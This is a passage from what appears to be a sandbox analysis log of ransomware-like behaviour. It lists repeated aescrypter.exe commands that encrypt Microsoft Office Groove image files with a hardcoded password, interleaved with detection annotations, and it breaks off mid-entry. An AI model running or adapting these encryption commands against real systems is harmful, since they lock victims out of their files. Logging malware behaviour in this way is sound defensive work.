- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3060
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2760
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2776
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1088
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2816
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2812
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2920
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2832
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1880
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3036
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2268
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2288
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1860
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2232
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2588
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2236
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2592
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1204
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1092
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2912
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1064
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2220
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1644
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1904
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1780
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2340
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2540
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2848
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1640
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2732
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1896
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2892
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2328
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2156
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3068
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2880
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2628
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2352
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2932
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:292
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2284
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2320
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1536
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1196
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:316
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2192
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2140
- C:\ProgramData\local\aescrypter.exe
